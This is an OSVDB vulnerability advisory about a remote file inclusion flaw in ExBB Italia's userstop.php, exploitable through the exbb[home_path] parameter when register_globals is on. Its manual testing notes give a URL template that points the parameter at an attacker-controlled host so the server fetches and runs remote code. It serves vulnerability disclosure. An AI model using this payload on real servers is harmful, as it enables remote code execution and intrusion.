ExBB Italia userstop.php exbb[home_path] Variable Remote File Inclusion

2006-08-29T04:49:07
ID OSVDB:28251
Type osvdb
Reporter SHiKaA(SHiKaA@hotmail.com)
Modified 2006-08-29T04:49:07

Description

Vulnerability Description

ExBB Italia contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to userstop.php not properly sanitizing user input supplied to the 'exbb[home_path]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

ExBB Italia contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to userstop.php not properly sanitizing user input supplied to the 'exbb[home_path]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[Script Path]/modules/userstop/userstop.php?exbb[home_path]=http://[attacker]?

References:

Vendor URL: http://www.exbb.altervista.org/ Secunia Advisory ID:21681 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0553.html Generic Exploit URL: http://milw0rm.com/exploits/2273 FrSIRT Advisory: ADV-2006-3412 CVE-2006-4488 Bugtraq ID: 19753